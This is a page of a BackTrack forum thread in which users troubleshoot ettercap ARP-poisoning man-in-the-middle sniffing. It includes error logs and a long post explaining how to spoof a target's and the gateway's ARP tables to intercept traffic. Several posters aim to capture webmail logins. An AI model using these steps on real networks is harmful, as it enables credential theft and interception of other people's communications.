Page 5 of 25 FirstFirst ... 3456715 ... LastLast
Results 41 to 50 of 248

Thread: Sniffing Tutorial:

  1. #41
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    7

    Default problem with MITM

    Hi

    I've done all the procedures but i got some error messages within ettercap, i use BT 2.0 Beta, MSI s270 laptop.

    Here is the output of ettercap

    Code:
    ARP poisoning victims:
    
     GROUP 1 : ANY (all the hosts in the list)
    
     GROUP 2 : ANY (all the hosts in the list)
    Starting Unified sniffing...
    
    DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.21.112
    DHCP: [00:40:D0:7A:FC:16] DISCOVER 
    DHCP: [00:40:D0:7A:FC:16] DISCOVER 
    DHCP: [192.168.10.40] OFFER : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [00:40:D0:7A:FC:16] REQUEST 192.168.10.133
    DHCP: [192.168.10.40] ACK : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    DHCP: [192.168.10.42] OFFER : 192.168.10.135 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.142 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.123 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.123 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    DHCP: [192.168.10.42] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [192.168.10.40] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [192.168.10.42] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    DHCP: [192.168.10.40] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40 
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 60 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    SEND L3 ERROR: 28 byte packet (0800:01) destined to 192.168.10.40 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Operation not permitted)
    )
    Unified sniffing was stopped.
    ARP poisoner deactivated.
    RE-ARPing the victims...
    i didnt get a new certicficate at the victims machine btw
    victims, attacker and the router have communications eachother. (can ping eachother)

    what is the problem?

    btw i have got too much problems with that f.king laptop

  2. #42
    Just burned his ISO
    Join Date
    Nov 2006
    Posts
    24

    Default

    Hi all
    I have a question, when I start sniff with ettercap he doesn't show me what ettercap sniff for example he would show me something like this:

    DHCP: [00:400:7A:FC:16] REQUEST 192.168.21.112
    DHCP: [00:400:7A:FC:16] DISCOVER
    DHCP: [00:400:7A:FC:16] DISCOVER
    DHCP: [192.168.10.40] OFFER : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40
    DHCP: [00:400:7A:FC:16] REQUEST 192.168.10.133
    DHCP: [192.168.10.40] ACK : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40

    He tell me only that start sniff
    I can see only this:
    ARP poisoning victims:

    GROUP 1 : 192.168.x.x

    GROUP 2 : 192.168.x.x
    Starting Unified sniffing...
    At this point I can't see anything else

    Thanks all that help me!
    bye

  3. #43
    Just burned his ISO
    Join Date
    Dec 2006
    Posts
    1

    Default

    I found that if you have the IP target in group 1 and group 2, it does not work. Just try it with group 1 only.

    Quote Originally Posted by L0g0ff
    Hi all
    I have a question, when I start sniff with ettercap he doesn't show me what ettercap sniff for example he would show me something like this:

    DHCP: [00:400:7A:FC:16] REQUEST 192.168.21.112
    DHCP: [00:400:7A:FC:16] DISCOVER
    DHCP: [00:400:7A:FC:16] DISCOVER
    DHCP: [192.168.10.40] OFFER : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40
    DHCP: [00:400:7A:FC:16] REQUEST 192.168.10.133
    DHCP: [192.168.10.40] ACK : 192.168.10.133 255.255.255.0 GW 192.168.10.1 DNS 192.168.10.40

    He tell me only that start sniff
    I can see only this:
    ARP poisoning victims:

    GROUP 1 : 192.168.x.x

    GROUP 2 : 192.168.x.x
    Starting Unified sniffing...
    At this point I can't see anything else

    Thanks all that help me!
    bye

  4. #44
    Junior Member
    Join Date
    Nov 2006
    Posts
    26

    Default

    anybody got this to work with dwl - G122 ? ettercap crashes when i go sniff/unified sniffin/ rausb0

    unknown fysical layer type 0x322

  5. #45
    g4hsean
    Guest

    Default

    i was wondering when i use ettercap to sniff hotmail and gmail do all the computers trying to access hotmail have to connect to that 1 computer using ettercap? because i downloaded a program the other day that sniffs traffic but all victim computers have to connect to the sniffing computer.

  6. #46
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    4

    Default okokokok

    I've read all 5 pages of this post and it seems like most of you are new to sniffing and spoofing. It's quite simple yet complex I guess. I too was a noob, even with a weath of knowledge I will always feel like a noob. There's always something you don't know.

    a sniffer sniffs traffic.
    a spoofer spoofs/tricks MAC identities(ARP).

    With a basic hub, you usually can sniff traffic without spoofing. The reasoning is that a hub doesn't know or care about who's connected. All a hub wants to do is move packets around ports. Very basic. Yes this is a very dumbbed down version. So a hub can be sniffed without ARP spoofing/poisoning (mostly).

    A router or switch on the other hand is different. They have internal componets that keep track of the phisically connected devices. Not all switches do this but almost all routers do. A router knows based on the packets header that 192.168.1.100 is located at port 1, Therefore it is added to the CAM table. Every packet that is destined for 192.168.1.100 will be sent to port 1 based on the CAM table A.K.A. Content Addressable Memory. Please look this up as it will unboggle your mind.

    That being said. Now you can see that if you are 192.168.1.102, and you want to see a packet from 192.168.1.101, you cannot just sniff the network. you must in some way influence that packet to your physical port. Can you guess how we do that??? Thats right, about 60,000 posts later and a proggy gets made. We will use Arpspoof or ettercap to deform the ARP cache of your target. In this case 192.168.1.101. ARP works based on IP-MAC combos.

    IP:192.168.1.102 MAC: 00:11:22:33:44:55 US!
    IP:192.168.1.101 MAC: 00:11:22:33:44:66 THEM!
    IP:192.168.1.1 GATEWAY(Out to Internet)

    when 192.168.1.101 wants to send something to 192.168.1.105, It looks in it's arp table. If that IP-MAC combo is in the table then it will send the packet accordingly. If not, it will send an ARP request (who has 192.168.1.105?).

    So the theory of spoofing is that I need to tell 192.168.1.101 that I have address 192.168.1.105. So we beat the ARP packet to the punch. When you ARP spoof, you send TONS of ARP packets sayin I AM 192.168.1.105 with MAC 00:11:22:33:44:55. As you can see, That MAC is OURS. Now 192.168.1.101's ARP table contains that combo. When 192.168.1.101 sends a packet to 192.168.1.105, the packets header will contain OUR MAC. Therefore the router/switch will send it to whoever has that MAC.

    Your probably wondering why I put 192.168.1.1 as a gateway in the list. well, I'll tell ya. If your browsing the internet then your packets must go through the gateway. Now put 2 and 2 together. Spoof THEM as target 1 and GATEWAY as target 2. Now you'll see everything that is destined for the internet/Not your local Network. Thats y theres a target 1 and a target 2. Doesn't matter about direction.

    target 1's packets will have a spoofed MAC in the ARP table as will Target 2. That spoofed MAC will be YOURS and you will be forwarding every packet after you make a copy first. Your box will be turned into a packet forwarder.


    Well it's been fun and I forgot what you posted about about ettercap/arpspoof. I hope this sums it up in a VERY basic and concise way. There is alot more to it, it's up to you to research. Thank you for playing.
    Peace.

    P.S. I love backtrack. Even tho I have 3 posts, I've been using it for over a year. I miss the old site forum. Had more posts in there. So, Thank you to Mutts and all. I will enjoy this distro for the years to come.

  7. #47
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    12

    Default

    i am not sure what is going on i have followed to the tee now i have bt2.0 final and ettercap is version 0.7.3 and i go to unified sniffing select eth1 (that is the interface connected to the wireless internet then push ctrl s it says randomizing 255 hosts for scanning, 1 hosts added to the hosts list then i select mitm arp poisoning, i check sniff remote connections click ok. now it tells me that arp poisoning victims: GROUP 1 : Any GROUP 2 : Any then i select start start sniffing it then tells me it has started unified sniffing. When i go to yahoo to log into my mail my bt tells be nothing and i am able to log in with no security issue??

  8. #48
    Junior Member
    Join Date
    Mar 2007
    Posts
    26

    Default

    this may be a really dumb question but I need to ask for verification. when cracking wep you dont have to be connected to the internet, but when sniffing I take it that you have to be connected to the internet, correct? (we all should be allowed one stupid question, lol)

  9. #49
    Just burned his ISO
    Join Date
    Feb 2007
    Posts
    12

    Default

    yes you have to be connected to that access point in order to sniff the packets on the network. I wasnt sure either then when i got nothing i tried to connect and it started to work, but i stll have issues. Also if the user uses internet explorer 7 ie will stop the page from loading and say they are being hacked pretty much. The do have the option to continue loading the site but i never got mine to load when i click that option.

  10. #50
    Just burned his ISO
    Join Date
    Feb 2006
    Posts
    15

    Default

    true, it kinda bugs the email sniffing function, because many people use IE7.

Page 5 of 25 FirstFirst ... 3456715 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •